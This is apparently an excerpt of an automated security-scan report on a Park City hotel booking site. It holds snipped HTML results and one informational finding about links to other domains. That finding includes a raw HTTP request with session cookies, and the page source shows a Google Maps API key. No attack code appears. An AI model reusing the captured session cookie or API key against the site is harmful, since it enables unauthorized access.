<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/b01e3128d7a405dbb5031afbb683e066.png' title='Parking' alt='Parking' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/b4abfce876e6328d40e7d6da6f13568f.png' title='Swimming Pool' alt='Swimming Pool' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/1b8a5baafcd13d3e63fc65de26a409b3.png' title='Fitness Room' alt='Fitness Room' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/aa2902cb8eb88e55bbcee78942ebb1d9.gif' title='Restaurants Not Available' alt='Restaurants Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/d0ee49fa9cbb74e995fe3b7f073ee20f.png' title='High Speed Internet' alt='High Speed Internet' style='height:22px;width:22px;'></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1436&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1436]); ><img src="http://s3.amazonaws.com/book_direct_images/l_3ab163ded569043a5ba8d6b7c415bc3e.jpg" title="Marriott MountainSide Resort"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1427&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1427]); ><img src="http://s3.amazonaws.com/book_direct_images/l_00d97fe26b5df107dcb4fff4abf524f3.jpg" title="Silver King Hotel"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1398&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1398]); ><img src="http://s3.amazonaws.com/book_direct_images/l_2c08f84f5f6cebbfafeb79b573924910.jpg" title="Carriage House Condominiums"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1386&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1386]); ><img src="http://s3.amazonaws.com/book_direct_images/l_88eb84a3441f85a2f3a5d33a2f622cad.jpg" title="Best Western Holiday Hills"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1411&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1411]); ><img src="http://s3.amazonaws.com/book_direct_images/l_bb5ef24549b781ea64501b3093562538.jpg" title="Prospector Square Lodge & Conference Center"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1448&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1448]); ><img src="http://s3.amazonaws.com/book_direct_images/l_f8c01d2b5755a239851e388436ec65b5.jpg" title="The Sky Lodge"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/b01e3128d7a405dbb5031afbb683e066.png' title='Parking' alt='Parking' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/b4abfce876e6328d40e7d6da6f13568f.png' title='Swimming Pool' alt='Swimming Pool' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/1b8a5baafcd13d3e63fc65de26a409b3.png' title='Fitness Room' alt='Fitness Room' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/926974964bd0f788099ef7af7d523b3a.png' title='Restaurants' alt='Restaurants' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/d0ee49fa9cbb74e995fe3b7f073ee20f.png' title='High Speed Internet' alt='High Speed Internet' style='height:22px;width:22px;'></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1493&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1493]); ><img src="http://s3.amazonaws.com/book_direct_images/l_92759ea5ad34825356e258a2597880a3.jpg" title="Jupiter Inn"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1572&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1572]); ><img src="http://s3.amazonaws.com/book_direct_images/l_8984bb33e54bd9d2372be2edbef9a879.jpg" title="Mountain Reservations"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1424&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1424]); ><img src="http://s3.amazonaws.com/book_direct_images/l_48ac0a67bd4711885228fc52a881ef28.jpg" title="Park City Marriott"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/b01e3128d7a405dbb5031afbb683e066.png' title='Parking' alt='Parking' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/b4abfce876e6328d40e7d6da6f13568f.png' title='Swimming Pool' alt='Swimming Pool' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/1b8a5baafcd13d3e63fc65de26a409b3.png' title='Fitness Room' alt='Fitness Room' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/926974964bd0f788099ef7af7d523b3a.png' title='Restaurants' alt='Restaurants' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/d0ee49fa9cbb74e995fe3b7f073ee20f.png' title='High Speed Internet' alt='High Speed Internet' style='height:22px;width:22px;'></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1732&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1732]); ><img src="http://s3.amazonaws.com/book_direct_images/l_c1182445a8474a77a929b606672e0326.jpg" title="Town Lift & Lift Lodge"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1441&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1441]); ><img src="http://s3.amazonaws.com/book_direct_images/l_e4bcd72250ffd5a9ef11c541cd6193a4.jpg" title="The Canyons Sundial Lodge"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1403&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1403]); ><img src="http://s3.amazonaws.com/book_direct_images/l_1fdefade33bd603756afd9f43f61898d.jpg" title="Identity Properties"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1437&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1437]); ><img src="http://s3.amazonaws.com/book_direct_images/l_be0999e9760d8fb45524f27fab9151e9.jpg" title="Marriott Summit Watch at Park City"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1384&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1384]); ><img src="http://s3.amazonaws.com/book_direct_images/l_5e5e0e7a36afd90ba3dbda2fb1903686.jpg" title="Park City Lodging, Inc."></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1387&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1387]); ><img src="http://s3.amazonaws.com/book_direct_images/l_cea00e0ba9eb0e3a81aae3473d190992.jpg" title="Star Hotel"></a>
...[SNIP]...
p?group_id=982&cloneID=41&catID=103&eventID=38674&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',38674]); ><img src="http://s3.amazonaws.com/book_direct_images/l_a75817cf46b015b0ada26f94b8671ba2.jpg" title="The Trace Bed & Breakfast"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/b01e3128d7a405dbb5031afbb683e066.png' title='Parking' alt='Parking' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/e163a21a09f8d8ae26e02bfef7d05023.gif' title='Swimming Pool Not Available' alt='Swimming Pool Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/540aed1002590a31ae1c73fb8187f68f.gif' title='Fitness Room Not Available' alt='Fitness Room Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/aa2902cb8eb88e55bbcee78942ebb1d9.gif' title='Restaurants Not Available' alt='Restaurants Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/d0ee49fa9cbb74e995fe3b7f073ee20f.png' title='High Speed Internet' alt='High Speed Internet' style='height:22px;width:22px;'></div>
...[SNIP]...
p?group_id=982&cloneID=41&catID=103&eventID=42689&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',42689]); ><img src="http://s3.amazonaws.com/book_direct_images/eda9f22b16cd6114296ba0da71794713.jpg" title="Cottage On The Park"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/b01e3128d7a405dbb5031afbb683e066.png' title='Parking' alt='Parking' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/9f9f7842e5e9f0a6a2411346d9ce9be8.png' title='Shuttle Service' alt='Shuttle Service' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/e163a21a09f8d8ae26e02bfef7d05023.gif' title='Swimming Pool Not Available' alt='Swimming Pool Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/540aed1002590a31ae1c73fb8187f68f.gif' title='Fitness Room Not Available' alt='Fitness Room Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/aa2902cb8eb88e55bbcee78942ebb1d9.gif' title='Restaurants Not Available' alt='Restaurants Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/d0ee49fa9cbb74e995fe3b7f073ee20f.png' title='High Speed Internet' alt='High Speed Internet' style='height:22px;width:22px;'></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1395&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1395]); ><img src="http://s3.amazonaws.com/book_direct_images/l_5a78eab8112163a9d9730176e33302ee.jpg" title="Blooming Resort Rentals"></a>
...[SNIP]...
p?group_id=982&cloneID=41&catID=103&eventID=41699&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',41699]); ><img src="http://s3.amazonaws.com/book_direct_images/l_7c22ec34b45580c141c00b7ad5ac0e22.jpg" title="Park City Crash Pads"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/b01e3128d7a405dbb5031afbb683e066.png' title='Parking' alt='Parking' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/e163a21a09f8d8ae26e02bfef7d05023.gif' title='Swimming Pool Not Available' alt='Swimming Pool Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/540aed1002590a31ae1c73fb8187f68f.gif' title='Fitness Room Not Available' alt='Fitness Room Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/aa2902cb8eb88e55bbcee78942ebb1d9.gif' title='Restaurants Not Available' alt='Restaurants Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/d0ee49fa9cbb74e995fe3b7f073ee20f.png' title='High Speed Internet' alt='High Speed Internet' style='height:22px;width:22px;'></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1416&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1416]); ><img src="http://s3.amazonaws.com/book_direct_images/l_0bc03da7d4c0f4726e437c0c05f82dfe.jpg" title="Utah Vacation Homes"></a>
...[SNIP]...
p?group_id=982&cloneID=41&catID=103&eventID=37580&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',37580]); ><img src="http://s3.amazonaws.com/book_direct_images/l_5d4fd2686113fcef79928ad9d5433747.jpg" title="The Canyons Escala Lodges"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/57eb7130536632921d0c11351a0a7388.gif' title='Parking Not Available' alt='Parking Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/e163a21a09f8d8ae26e02bfef7d05023.gif' title='Swimming Pool Not Available' alt='Swimming Pool Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/540aed1002590a31ae1c73fb8187f68f.gif' title='Fitness Room Not Available' alt='Fitness Room Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/aa2902cb8eb88e55bbcee78942ebb1d9.gif' title='Restaurants Not Available' alt='Restaurants Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/1560122293a8d9ce4d090a1f6f5f32b2.gif' title='High Speed Internet Not Available' alt='High Speed Internet Not Available' style='height:22px;width:22px;'></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1414&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1414]); ><img src="http://s3.amazonaws.com/book_direct_images/l_7951d02d53be187fd1b816324c20e911.jpg" title="ResortQuest Park City"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1396&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1396]); ><img src="http://s3.amazonaws.com/book_direct_images/l_12f41d7315c74db110d3587f85e9ce68.jpg" title="Blue Church Lodge and Townhouses"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1419&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1419]); ><img src="http://s3.amazonaws.com/book_direct_images/l_181b9155b3a729276978989bd94512f1.jpg" title="Chateau Apres"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1494&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1494]); ><img src="http://s3.amazonaws.com/book_direct_images/l_a8ff4764a200d7ca7b4ca45930d1d6be.jpg" title="Park City Canyons Properties"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1394&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1394]); ><img src="http://s3.amazonaws.com/book_direct_images/l_ceeb1a473a01bf9e407c24f353e25294.jpg" title="Aspens Ski Condo Rentals"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1407&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1407]); ><img src="http://s3.amazonaws.com/book_direct_images/l_ac62d92cecf212dfb615b53378f330e6.jpg" title="Park Plaza Condominiums"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1405&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1405]); ><img src="http://s3.amazonaws.com/book_direct_images/l_a824f4d448a76e7d475537d825245ce5.jpg" title="Park Avenue Reservations"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1573&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1573]); ><img src="http://s3.amazonaws.com/book_direct_images/l_b5a6e1fd5d422ee5eb8a5853184a5e09.jpg" title="Park City Mountain Reservations"></a>
...[SNIP]...
p?group_id=982&cloneID=41&catID=103&eventID=37642&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',37642]); ><img src="http://s3.amazonaws.com/book_direct_images/l_10b6c0469bd5234c02a15187571eca06.jpg" title="Bear Hollow Rentals"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/57eb7130536632921d0c11351a0a7388.gif' title='Parking Not Available' alt='Parking Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/e163a21a09f8d8ae26e02bfef7d05023.gif' title='Swimming Pool Not Available' alt='Swimming Pool Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/540aed1002590a31ae1c73fb8187f68f.gif' title='Fitness Room Not Available' alt='Fitness Room Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/aa2902cb8eb88e55bbcee78942ebb1d9.gif' title='Restaurants Not Available' alt='Restaurants Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/1560122293a8d9ce4d090a1f6f5f32b2.gif' title='High Speed Internet Not Available' alt='High Speed Internet Not Available' style='height:22px;width:22px;'></div>
...[SNIP]...
</div>
               <a style="display:inline-block;font-size:10px;font-weight:normal;" onclick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Directory Link']); " href="http://www.parkcityinfo.com/visitors/lodging-hotels/">Return to Hotels &amp; Resorts Directory</a>
...[SNIP]...
</div>
               <a style="display:inline-block;font-size:10px;font-weight:normal;" onclick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Directory Link']); " href="http://www.parkcityinfo.com/visitors/lodging-hotels/">Return to Hotels &amp; Resorts Directory</a>
...[SNIP]...
</div>
<iframe src="http://www.parkcityinfo.com/footer_jackrabbit.cfm" width="100%" height="75" frameborder="0" allowtransparency="true" scrolling="no"></iframe>
...[SNIP]...
<div id="page_footer" style="padding-bottom:25px; color:#444; font-size:11px;"><a href="http://www.jackrabbitsystems.com/" target="_blank" style="color:#444; font-size:11px;"><img src="http://www.jackrabbitsystems.com/images/trip_images/powered_by_jackrabbit.png" name="powered_by_img" id="powered_by_img" style="border:none;"></a>
...[SNIP]...

5.6. http://parkcitytrips.com/booking_results.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /booking_results.php?cloneID=41&rooms=1&nights=1&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://parkcitytrips.com/redirect_booking.php?clone_id=41&group_id=982
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a; __utmz=1.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=1.570101180.1297289442.1297289442.1297289442.1; __utmc=1; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:48:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 433045


                   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
                   <html><head>
                   <meta http-equiv="Content-Type" content="text/html; charset=iso-885
...[SNIP]...
</title>
                   <link rel="stylesheet" type="text/css" href="http://www.prod.bookdirect.net/css/smoothness/jquery-ui-1.7.2.custom.css" />
                   
                                       <link rel="stylesheet" type="text/css" href="/css/parkcity_template.css" />
                                       
                   <script src="http://maps.google.com/maps?file=api&amp;v=2.109&amp;key=ABQIAAAAKZm_5hsUqOpv5DxPV4HooBROL83n-bgKgORxim6v55hn_ZaBnxSpV4rEbp2tOu1bjGh1t-gicIUDyw" type="text/javascript"></script>
...[SNIP]...
</div>
<iframe src="http://www.parkcityinfo.com/header_jackrabbit.cfm" width="100%" height="115" frameborder="0" allowtransparency="true" scrolling="no"></iframe>
...[SNIP]...
<div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/8fa9e98acf5e2b247caa70669df6c903.png' title='Parking' alt='Parking' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Parking']); toggle_amenity('4', 'aa5d43508b4cec0724f75af8ae868ca6.png', '8fa9e98acf5e2b247caa70669df6c903.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div><div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/1fc82576cbb0bcebaf66b495707dd675.png' title='Shuttle Service' alt='Shuttle Service' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Shuttle Service']); toggle_amenity('1', '4a91a9bdeccb5f084339608bb1039e67.png', '1fc82576cbb0bcebaf66b495707dd675.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div><div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/90d28b770896393a5d24deaa76adf104.png' title='Pets Allowed' alt='Pets Allowed' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Pets Allowed']); toggle_amenity('31', '9ce03aac14ae7f31e817e122d6f60bd4.png', 